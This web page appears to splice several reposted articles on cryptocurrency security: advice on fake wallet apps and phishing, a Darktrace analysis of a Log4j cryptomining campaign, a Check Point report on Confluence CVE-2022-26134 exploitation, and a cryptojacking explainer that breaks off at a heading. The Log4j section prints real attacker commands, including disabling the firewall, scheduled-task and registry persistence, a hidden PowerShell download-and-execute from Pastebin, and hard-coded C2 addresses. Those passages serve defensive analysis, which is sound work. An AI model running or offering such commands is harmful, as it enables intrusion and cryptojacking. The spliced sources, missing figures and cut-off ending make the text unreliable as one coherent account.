CryptoDeepTech

CRYPTO DEEP TECH

The rise of fake cryptocurrency apps and how to avoid them. Scammers are using fake crypto apps to steal funds from investors. Some malicious apps find their way into official app stores.

And, according to the latest fraud report, fraudsters are using fake crypto apps to steal money from unsuspecting crypto investors. It highlights that American investors have lost approximately $42.7 million to swindlers through fake apps.

The schemes reportedly take advantage of heightened interest in cryptocurrencies, especially during bull market runs, to beguile crypto users.

How fake crypto app scammers lure users

Fake crypto app scammers use myriad techniques to entice investors. The following is a breakdown of some of them.

Social engineering schemes

Some fake crypto app scammer networks use social engineering strategies to entice victims.

In many cases, the fraudsters befriend the victims through social platforms such as dating sites and then trick them into downloading apps that appear to be functional cryptocurrency trading apps.

The scammers then convince users to transfer funds to the app. The funds are, however, “locked in” once the transfer is made, and the victims are never allowed to withdraw money.

In some cases, the scammers lure victims using outlandish high-yield claims. The ruse comes to an end when the victims realize that they can’t redeem their funds.

Speaking to Cointelegraph earlier this week, Rick Holland, chief information security officer of Digital Shadows — a digital risk protection firm — underscored that social engineering remains a top strategy among crooks because it requires minimal effort.

“Relying upon the tried-and-true method of social engineering is far more practical and lucrative,” he said.

The cybersecurity manager added that social engineering makes it easy for scammers to target high-net-worth individuals.

Context: Bob ( fake name, real person) received a text claiming to be from his exchange. The message states that due to the recent ban on crypto in China, all users must withdraw their funds to a defi wallet. The text also included a link to the wallet where Bob can transfer his funds. After downloading the wallet, Bob removed all of his funds from the exchange. More than $10 million in ERC20-USDT were transferred. Little did Bob know that he had just become the victim of a phishing scam. Bob reached out to us for help recovering his funds.

Bob wasn’t the first person to contact us regarding these scams. Scams are becoming more common as interest in cryptocurrency grows. According to data from our MistTrack service, more than 60% of all reported hacks were related to fake wallets.

There are several ways to protect yourself against phishing attacks:

• Never click on any link from an unknown source, even if it appears legitimate. Scammers frequently send emails or texts containing links to a fake wallet.

• Always go to the original website rather than clicking on sponsored ads. Scammers often purchase ad space on search engines to promote their counterfeit website that often appears genuine.

• Scammers will regularly message you pretending to help. After gaining your trust, they will send you a link to download their app and transfer funds to it. They will often fabricate why you cannot withdraw funds unless you deposit additional funds into it.

Many who fall victim to these scams never receive their money back.

Scammers would often pose as support from Metamask. They would pretend to help anyone currently having difficulties using Metamask. After gaining their trust, they would send over a link asking the victim to input their seed phase. Metamask will NEVER ask for your seed phrase or private key. This is what a fake Metamask wallet might look like.

In-depth analysis

Our team begins to analyze and research the information provided by these victims. According to our ongoing investigation, tens of thousands of victims had their assets stolen from these phishing scams. So far, the total amount stolen exceeds $1.3 billion. These are the only funds reported to SlowMist, and we only counted ETH, BTC, TRX, ERC20-USDT, and TRC20-USDT.

One victim provided us with the Tron address of the scammer. Using MistTrack, our team was able to track down and analyze the scammer’s address. It showed an additional 14 addresses that had transferred funds to this address. We can assume that these addresses also fell victims to this phishing scam. In total, the scammer was able to walk away with over $250,000 in Trc20-USDT. Which they later distributed to various Binance accounts.

We followed one of these Binance accounts and discovered it had over $600,000 in TRC20 — USDT. Imagine the total amount stolen if this was just one of the addresses the scammer uses.

As we investigated further into this account, we discovered more illegal activity associated with it. According to our AML(anti-money laundering) software, a BTC address associated with this account (32q…fia) was used for extortion. Through the investigation of this address, we concluded that these phishing schemes were not isolated events but rather part of a larger global scale.

Furthermore, our research indicates that the scammer will frequently transfer portions of the funds to multiple exchanges and to another scammer wallet with a significant amount of transactions to confuse our analysis.

Recognizable brand names

Some fake crypto app scammers have resorted to using recognizable brand names to push fake apps because of the trust and authority that they wield.

In one case highlighted in the latest crypto crime report, cybercriminals posing as YiBit employees recently hoodwinked investors out of some $5.5 million after convincing them to download a bogus YiBit crypto trading app.

Unbeknown to the investors, the actual YiBit crypto exchange firm ceased operations in 2018. Fund transfers made to the fake app were stolen.

In another case outlined in the report, phishers using the Supay brand name, which is associated with an Australian crypto company, swindled 28 investors out of millions of dollars. The ploy, which ran between Nov. 1 and Nov. 26, caused $3.7 million in losses.

Such schemes have been going on for years, but many incidences go unreported due to the lack of proper recourse channels, especially in jurisdictions that shun cryptocurrencies.

Besides the U.S., investigations in other major jurisdictions such as India have in the recent past uncovered elaborate fake crypto app schemes.

According to a report published by the CloudSEK cybersecurity company in June, a newly discovered fake crypto app scheme involving numerous cloned apps and domains caused Indian investors to lose at least $128 million.

Distributing fake apps through official app stores

Fake crypto app scammers sometimes use official app stores to distribute dodgy applications.

Some of the apps are designed to collect user credentials that are then used to unlock crypto accounts on corresponding official platforms. Others claim to offer secure wallet solutions that can be used to store a diverse range of cryptocurrencies but pilfer funds once a deposit is made.

While platforms such as Google Play Store constantly review apps for integrity issues, it is still possible for some fake apps to slip through the cracks.

One of the latest methods used by scammers to accomplish this is registering as app developers on popular mobile app stores such as the Apple App Store and Google Play Store and then uploading legitimate-looking apps.

In 2021, a fake Trezor app masquerading as a wallet created by SatoshiLabs used this strategy to get published on both Apple App Store and Google Play Store. The app claimed to provide users with direct online access to their Trezor hardware wallets without needing to connect their Trezor dongle to a computer.

Victims who downloaded the fake Trezor app were obligated to submit their wallet seed phrase to start using the service. A seed phrase is a string of words that can be used to access a cryptocurrency wallet on the blockchain.

The submitted details allowed the thieves behind the fake app to loot user funds.

According to a statement provided by Apple, the fake Trezor app was published on its store through a deceptive bait-and-switch maneuver. The app developers are alleged to have initially submitted the app as a cryptography application designed to encrypt files but later on converted it to a cryptocurrency wallet app. Apple said that it was not aware of the change until users reported it.

Speaking to Cointelegraph earlier this week, Chris Kline, co-founder of Bitcoin IRA — a crypto retirement investment service — said that despite such incidents, major tech companies in the space were resolute in fighting fake crypto apps because of the potential damage to their integrity. He said: “Tech companies are always looking for better education and security for their users. The most reputable players today put security at the forefront of their roadmaps. Users need reassurance that their digital assets are safe and providers are keeping security top of mind.”

That said, the fake app problem is more prevalent in non-official app stores.

Cryptocurrency is risky enough without having to worry about scams. No matter which one you choose, you will deal with volatile values. Throw in some crooks, and the risk goes up exponentially.

Social media is a goldmine for scammers to find new victims. Now, fake crypto ads are circulating on Facebook and other platforms. The ads use images of well-known industry leaders to lure people into buying crypto that doesn’t exist.

Cybersecurity researchers recently found 40 copycat sites designed to look like legitimate crypto services. The sites advertise crypto wallet apps that are anything but legitimate. Keep reading to find out the risks and protect your finances.

Watch your wallet

Cryptocurrency wallets are physical or digital storage devices for your cryptocurrency. The wallets themselves hold public and private keys, which give you access to your crypto.

How to spot a fake crypto app

Fake cryptocurrency apps are designed to resemble legitimate apps as closely as possible. As a crypto investor, one should be able to discern between legitimate and fake apps to avoid unnecessary losses.

The following is a breakdown of some of the things to look out for when trying to ascertain the authenticity of a mobile crypto application.

Evidence shows that a crook is recruiting partners to distribute these bad apps via telemarketing, social media, advertisement, SMS, third-party channels, fake websites and more.

ESET researchers also uncovered malicious wallets being distributed via legitimate Chinese websites, with articles containing links to fake wallet apps. The posts used real wallet names such as Coinbase, imToken, Bitpie, MetaMask, TokenPocket, OneKey and Trust Wallet but led to copycat websites.

A thief used another legitimate Chinese website to post an article about Beijing’s crypto ban. The author included a list of genuine crypto wallets to get around the ban, along with links to bogus websites with download links for fake apps.

Different effects on iOS and Android

The malware works differently depending on your operating system. The fake Android wallet apps target new crypto users who do not have a legitimate wallet app installed on their devices.

If you already have an official wallet app, the malicious one won’t be installed due to Android security measures, which don’t let you replace an original app with one that isn’t legitimate.

The copycat websites let Android users download the malicious apps from their servers even if they tap on the “Get it on Google Play” button. Following that, the app needs to be installed manually.

When it comes to iOS, multiple versions of an app can be installed simultaneously. But due to Apple’s stricter screening process, you won’t find these malicious apps in the App Store. So if you are an Apple user, you’d have to install the malicious apps from a third-party store or click on malicious links found on places like social media.

The websites for these apps let users download apps outside the official store, using a system Apple put in place for businesses and educational institutes to install custom apps without going through the App Store. You must then manually install these apps.

Once the app is up and running, it appears to work like a legitimate crypto wallet. But it isn’t. Instead, it’s stealing the currency deposited into it.

Spelling, icons and description

The first step in ascertaining whether an app is legit is checking out the spelling and icon. Fake apps usually have a name and icon that looks similar to the legitimate one, but something is usually off.

If the app or developer names are misspelled, for example, the software is most likely phony. A quick search about the app on the internet will help to confirm its legitimacy.

It is also important to consider if the app has a Google Editor’s choice badge. The badge is a distinction provided by the Google Play editorial team to recognize developers and apps with outstanding quality. Apps with this badge are unlikely to be fake.

Don’t be a victim

Follow these tips to keep crypto scammers at bay:

• Use official apps from official app stores that contain links to official websites.

• Be wary of online ads for crypto.

• Research any wallet app you’re interested in. Look for reviews and information about the company behind the app.

• Before you buy crypto, read Kim’s eBook on the subject.

Application permissions

Counterfeit apps usually request more permissions than necessary. This ensures that they glean as much data as possible from victims’ devices.

As such, users should be wary of apps that require off-center permissions, such as device administrator privileges. Such authorizations could give cybercriminals unfettered access to a device and allow them to intercept sensitive data that can be used to unlock financial accounts, including crypto wallets.

Intrusive app permissions can be blocked via a phone system’s privacy settings.

Fake websites

Scammers sometimes create fake cryptocurrency trading platforms or fake versions of official crypto wallets to trick unsuspecting victims. These fake websites usually have similar but slightly different domain names from the sites they attempt to mimic. They look very similar to legitimate sites, making it difficult to tell the difference. Fake crypto sites often operate in one of two ways:

• As phishing pages: All the details you enter, such as your crypto wallet’s password and recovery phrase and other financial information, end up in the scammers’ hands.

• As straightforward theft: Initially, the site may allow you to withdraw a small amount of money. As your investments seem to perform well, you might invest more money in the site. However, when you subsequently want to withdraw your money, the site either shuts down or declines the request.

Phishing scams

Crypto phishing scams often target information relating to online wallets. Scammers target crypto wallet private keys, which are required to access funds within the wallet. Their method of working is similar to other phishing attempts and related to the fake websites described above. They send an email to lure recipients to a specially created website asking them to enter private key information. Once the hackers have acquired this information, they steal the cryptocurrency in those wallets.

Pump and dump schemes

This involves a particular coin or token being hyped by fraudsters through an email blast or social media such as Twitter, Facebook, or Telegram. Not wanting to miss out, traders rush to buy the coins, driving up the price. Having succeeded in inflating the price, the scammers then sell their holdings – which causes a crash as the asset’s value sharply declines. This can happen within minutes.

Fake apps

Another common way scammers trick cryptocurrency investors is through fake apps available for download through Google Play and the Apple App Store. Although these fake apps are quickly found and removed, that doesn’t mean the apps aren’t impacting many bottom lines. Thousands of people have downloaded fake cryptocurrency apps.

Fake celebrity endorsements

Crypto scammers sometimes pose as or claim endorsements from celebrities, businesspeople, or influencers to capture the attention of potential targets. Sometimes, this involves selling phantom cryptocurrencies that don’t exist to novice investors. These scams can be sophisticated, involving glossy websites and brochures that appear to show celebrity endorsements from household names such as Elon Musk.

Giveaway scams

This is where scammers promise to match or multiply the cryptocurrency sent to them in what is known as a giveaway scam. Clever messaging from what often looks like a valid social media account can create a sense of legitimacy and spark a sense of urgency. This supposed ‘once-in-a-lifetime’ opportunity can lead people to transfer funds quickly in the hope of an instant return.

Blackmail and extortion scams

Another method scammers use is blackmail. They send emails that claim to have a record of adult websites visited by the user and threaten to expose them unless they share private keys or send cryptocurrency to the scammer.

Cloud mining scams

Cloud mining refers to companies that allow you to rent mining hardware they operate in exchange for a fixed fee and a share of the revenue you will supposedly make. In theory, this allows people to mine remotely without buying expensive mining hardware. However, many cloud mining companies are scams or, at best, ineffective – in that you end up losing money or earning less than was implied.

Fraudulent initial coin offerings (ICOs)

An initial coin offering or ICO is a way for start-up crypto companies to raise money from future users. Typically, customers are promised a discount on the new crypto coins in exchange for sending active cryptocurrencies like bitcoin or another popular cryptocurrency. Several ICOs have turned out to be fraudulent, with criminals going to elaborate lengths to deceive investors, such as renting fake offices and creating high-end marketing materials.

How to spot cryptocurrency scams

So, how to spot a crypto scam? Warning signs to look out for include:

Promises of guaranteed returns: No financial investment can guarantee future returns because investments can go down as well as up. Any crypto offering that promises you will definitely make money is a red flag.

A poor or non-existent whitepaper: Every cryptocurrency should have a whitepaper since this is one of the most critical aspects of an initial coin offering. The whitepaper should explain how the cryptocurrency has been designed and how it will work. If the whitepaper doesn’t make sense – or worse, doesn’t exist – then tread carefully.

Excessive marketing: All businesses promote themselves. But one way that crypto fraudsters attract people is by investing in heavy marketing – online advertising, paid influencers, offline promotion, and so on. This is designed to reach as many people as possible in the shortest time possible – to raise money fast. If you feel that the marketing for a crypto offering seems heavy-handed or makes extravagant claims without backing them up, pause and do further research.

Unnamed team members: With most investment businesses, it should be possible to find out who the key people behind it are. Usually, this means easy-to-find biographies of the people who run the investment plus an active presence on social media. If you can’t find out who is running a cryptocurrency, be cautious.

Free money: Whether in cash or cryptocurrency, any investment opportunity promising free money is likely to be fake.

How to protect yourself from cryptocurrency scams

Many crypto frauds are sophisticated and convincing. Here are some steps you can take to protect yourself:

Protect your wallet: To invest in cryptocurrency, you need a wallet with private keys. If a firm asks you to share your keys to participate in an investment opportunity, it’s highly likely to be a scam. Keep your wallet keys private.

Keep an eye on your wallet app: The first time you transfer money, send only a small amount to confirm the legitimacy of a crypto wallet app. If you’re updating your wallet app and you notice suspicious behavior, terminate the update, and uninstall the app.

Only invest in things you understand: If it’s not clear to you how a particular cryptocurrency works, then it’s best to pause and do further research before you decide whether to invest.

Take your time: Scammers often use high-pressure tactics to get you to invest your money quickly – for example, by promising bonuses or discounts if you participate straightaway. Take your time and carry out your own research before investing any money.

Be wary of social media adverts: Crypto scammers often use social media to promote their fraudulent schemes. They may use unauthorized images of celebrities or high-profile businesspeople to create a sense of legitimacy, or they may promise giveaways or free cash. Maintain a healthy skepticism when you see crypto opportunities promoted on social media and do your due diligence.

Ignore cold calls: If someone contacts you out of the blue to sell you a crypto investment opportunity, it’s probably a scam. Never disclose personal information or transfer money to someone who contacts you in this way.

Only download apps from official platforms: Although fake apps can end up in the Google Play Store or Apple App Store, it is safer to download apps from these platforms than elsewhere.

Do your research: The most popular cryptocurrencies are not scams. But if you haven’t heard of a particular cryptocurrency, research it – see if there is a whitepaper you can read, find out who runs it and how it operates, and look for genuine reviews and testimonials. Look for an up-to-date and credible fake cryptocurrency list to check for scams.

Is it too good to be true: Companies that promise guaranteed returns or to make you rich overnight are likely to be scams. If something seems too good to be true, tread carefully.

Finally, as with any investment opportunity, never invest money you can’t afford to lose. Even if you’re not being scammed, cryptocurrency is volatile and speculative, so it’s essential to understand the risks.

What to do if you fall victim to a crypto scam

Falling victim to a cryptocurrency scam can be devastating, and it’s essential to act quickly if you have made a payment or disclosed personal information.

Contact your bank immediately if you have:

• Made a payment using a debit or credit card.

• Made a payment via bank transfer.

• Shared personal details about yourself.

Crypto fraudsters often sell the details they have captured to other criminals. So, it’s essential to change your usernames and passwords across the board, to prevent further damage. If you are the victim of a social media crypto scam, you can report it to the relevant social media platform. Depending on where you live, you can report frauds to the relevant body in your jurisdiction – for example, in the US, that would be the Federal Trade Commission. Other countries have their own equivalents.

The number of downloads

The number of times that an app has been downloaded is usually an indicator of how popular it is. Apps from reputable developers typically have millions of downloads and thousands of positive reviews.

Inversely, apps with just a few thousand downloads require greater scrutiny.

Confirming authenticity by contacting support

If unsure about an application, contacting support through the company’s official website could help to avoid financial losses due to fraud.

Furthermore, authentic apps can be downloaded from a company’s official website.

Cryptocurrencies are underpinned by relatively new technology, so it is only natural that there are teething problems when it comes to use and adoption. Unfortunately, in recent years, black hats have targeted naïve crypto enthusiasts using fake crypto apps.

While the problem is likely to persist for several years, increased scrutiny by tech companies is likely to temper the issue in the long run.

Literature:

Investigation of Cryptocurrency Wallets on
iOS and Android Mobile Devices for Potential Forensic Artifacts
Angelica Montanez

https://cryptodeep.ru/doc/Montanez-Angelica_Final-Research-P...

Summary

This type of fraudulent activity is not only prevalent at the moment, but it is also on the rise. Every day, a growing number of people fall victim to this. Users should always be cautious and suspicious of phishing scams.

GitHub

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/EkU8YhB91MI

Source: https://cryptodeeptech.ru/crypto-wallet-protection

Криптоанализ

CRYPTO DEEP TECH

Background on Log4j

Alibaba Cloud Security Team publicly disclosed a critical vulnerability (CVE-2021-44228) enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by attackers connecting via any protocol such as HTTPS and sending a specially crafted string.

Log4j crypto-mining campaign

Darktrace detected crypto-mining on multiple customer deployments which occurred as a result of exploiting this Log4j vulnerability. In each of these incidents, exploitation occurred via outbound SSL connections which appear to be requests for base64-encoded PowerShell scripts to bypass perimeter defenses and download batch (.bat) script files, and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts.

The attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMWare Horizons servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. Following successful exploitation, the server performs a callback on port 1389, retrieving a script named mad_micky.bat. This achieves the following:

• Disables Windows firewall by setting all profiles to state=off
  ‘netsh advfirewall set allprofiles state off’

• Searches for existing processes that indicate other miner installs using ‘netstat -ano | findstr TCP’ to identify any process operating on ports :3333, :4444, :5555, :7777, :9000 and stop the processes running

• A new webclient is initiated to silently download wxm.exe

• Scheduled tasks are used to create persistence. The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ schedules a task and suppresses warnings, the task is to be scheduled within a minute of command and given the name, ‘BrowserUpdate’, pointing to malicious domain, ‘b.oracleservice[.]top’ and hard-coded IP’s: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080

• Registry keys are added in RunOnce for persistence: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

In at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent only seen during this activity it is suspicious.

Following successful exploitation, the server performs a callback on port 1389, to retrieve script files. In this example, /xms.ps1 a base-64 encoded PowerShell script that bypasses execution policy on the host to call for ‘mad_micky.bat’:

Figure 1: Additional insight on PowerShell script xms.ps1

The snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download:

Figure 2: Log data highlighting mad_micky.bat file

Additional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses located in Korea and Ukraine. A connection was made to the Ukrainian IP to download executable file xm.exe, which activates the miner. The miner, XMRig Miner (in this case) is an open source, cross-platform mining tool available for download from multiple public locations. The next observed exe download was for ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

Figure 3: Additional insight regarding XMRig executable

The connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes running tasks associated with logging, including SCM event log filter or PowerShell event log consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The log deletes were conducted through scheduled tasks and WMI included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

• Config file (no longer hosted): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

The second file requested from Pastebin, though no longer hosted by Pastebin, is part of a schtasks command, and so probably used to establish persistence:

• schtasks /create /sc MINUTE /mo 5 /tn  “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'”  /F /ru System

The executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this cmd.exe and wmic commands were used to configure the miner.

These file downloads and miner configuration were followed by additional connections to Pastebin.

Figure 4: OSINT correlation of mad_micky.bat file

Detecting the campaign using Darktrace

The key model breaches Darktrace used to identify this campaign include compromise-focussed models for Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server, and Beaconing to Rare Destination. File-focussed models for Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations, and Compressed Content from Rare External Location. Cryptocurrency mining is detected under the Cryptocurrency Mining Activity models.

The models associated with Unusual PowerShell to Rare and New User Agent highlight the anomalous connections on the infected devices following the Log4j callbacks.

Customers with Darktrace’s Autonomous Response technology, Antigena, also had actions to block the incoming files and scripts downloaded and restrict the infected devices to normal pattern of life to prevent both the initial malicious file downloads and the ongoing crypto-mining activity.

Appendix

Darktrace model detections

• Anomalous Connection / Application Protocol on Uncommon Port

• Anomalous Connection / New User Agent to IP Without Hostname

• Anomalous Connection / PowerShell to Rare External

• Anomalous File / EXE from Rare External location

• Anomalous File / Masqueraded File Transfer

• Anomalous File / Multiple EXE from Rare External Locations

• Anomalous File / Script from Rare External Location

• Anomalous File / Zip or Gzip from Rare External Location

• Anomalous Server Activity / Outgoing from Server

• Compliance / Crypto Currency Mining Activity

• Compromise / Agent Beacon (Long Period)

• Compromise / Agent Beacon (Medium Period)

• Compromise / Agent Beacon (Short Period)

• Compromise / Beacon to Young Endpoint

• Compromise / Beaconing Activity To External Rare

• Compromise / Crypto Currency Mining Activity

• Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

• Device / New PowerShell User Agent

• Device / Suspicious Domain

MITRE ATT&CK techniques observed

IoCs

On May 31, a critical unpatched vulnerability, which affects all confluence server and data center supported versions was reported to Atlassian by Volexity, a security company.

Atlassian warned their customers of the critical vulnerability on June 2 and issued a patch a day later. CISA added this vulnerability to their list of Known Exploited Vulnerabilities on June 3.

Check Point released a dedicated protection to prevent an attack exploiting this vulnerability and advises customers to patch the affected systems.

The Vulnerability

The vulnerability in the Atlassian Confluence and Data Center, designated as CVE-2022-26134, may lead to an unauthenticated Object-Graph Navigation Language (OGNL) expression injection attack.

A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.

Figure 1: Malicious payload that exploits CVE-2022-26134.

In The Wild Exploitation

Check Point Research (CPR) researchers noticed a large number of exploitations attempts since the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. After a few days, the attackers started to use the vulnerability to download malware to the affected systems.

Among the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows.

The infection chain depends on the victim’s operating system.

The Linux OS Targeted Attack

The attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim.

Figure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload.

The base64 string decodes into another base64 encoded string. Overall, researchers had to decode the string a few times to get the actual payload.

Figure 3: The decoded base64 string.

This script downloads a bash script file called xms from the remote C&C server to the victim’s tmp folder, executes it, and deletes it afterward.

Figure 4: Part of the malicious xms script.

The xms file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot.

In addition, a network connectivity test to a[.]oracleservice.top is performed constantly.

In an attempt to spread to other machines, the script searches for ssh keys and tries to connect. It then downloads the xms file from the C&C server and executes it.

The script downloads an elf executable file called dbused to the tmp folder in various remote IPs.

The dbused file is packed using upx to avoid static detection.

The elf file is a crypto miner that exhausts the victim machine’s resources:

The Windows OS Targeted Attack

The attacker utilized the Atlassian vulnerability to execute a PowerShell download cradle to initiate a fileless attack from a remote C&C server.

Figure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands.

The lol.ps1 script is injected to a PowerShell memory process.

The script verifies the processor’s architecture, using wmi to check whether it matches its requirements.
It then downloads an executable file called checkit2 to the tmp folder and runs it in hidden mode.

The checkit2.exe process spawns a child process, called InstallUtil.exe, which connects to the C&C server. The InstallUtil.exe in turn spawns another child process child process, AddInProcess.exe, which is the crypto miner. After a few moments of running on the victim’s machine, the checkit2 process terminates itself.

Figure 11: Crypto wallet information.

Attack chain

Both attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The attacker executes commands using the Java execution function to download a malicious payload to the victim’s machine.

The malicious payload then downloads an executable file according to the affected OS. Both executables run a crypto miner to utilize the victim’s resources for their own benefit.

Threat Actors

The a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “8220 gang”.

Check Point Protections:

IPS:
Atlassian Confluence Remote Code Execution (CVE-2022-26134)

Anti-Bot:
Trojan.WIN32.XMRig

Cryptojacking explained: How to prevent, detect, and recover from it

Criminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it.

Cryptojacking definition

Cryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins.

Regardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice is slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills.

How cryptojacking works

Coin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain.

“Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed a recent Investopedia explainer on how Bitcoin mining works. “In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.”

Earning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time.

Cybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker.

Cryptojacking attack methods

The attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today.

Endpoint attacks

In the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps.

The most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. It runs in the background and sends results back via a command and control (C2) infrastructure.

Another method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers.

These avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below.

Scan for vulnerable servers and network devices

Attackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they usually are usually higher powered than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices.

“We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. “Hackers are breaking into networks and installing malware that uses storage to mine cryptos.”

Software supply chain attacks

Cybercriminals are targeting the software supply chain by seeding open-source code repositories with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user.

Leveraging cloud infrastructure

Many cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. A study last fall by Google’s Cybersecurity Action Team reported that 86% of compromised cloud instances are used for cryptomining.

“Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote in a blog post.

One of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems.

“The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security, in a blog post explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.”

Why cryptojacking is popular

According to a report by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners. Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals.

When a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure.

Real-world cryptojacking examples

WatchDog targets Docker Engine API endpoints and Redis servers

A honeypot from the security research team at Cado Labs discovered a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propogate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns.

Alibaba ECS instances in cryptomining crosshairs

TeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. Researchers with TrendMicro in late 2021 reported that this group, along with rivals like the Kinsig gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Computing Service (ECS) instances and disabling security features to evade detection.

Miner bots and backdoors use Log4J to attack VMware Horizon servers

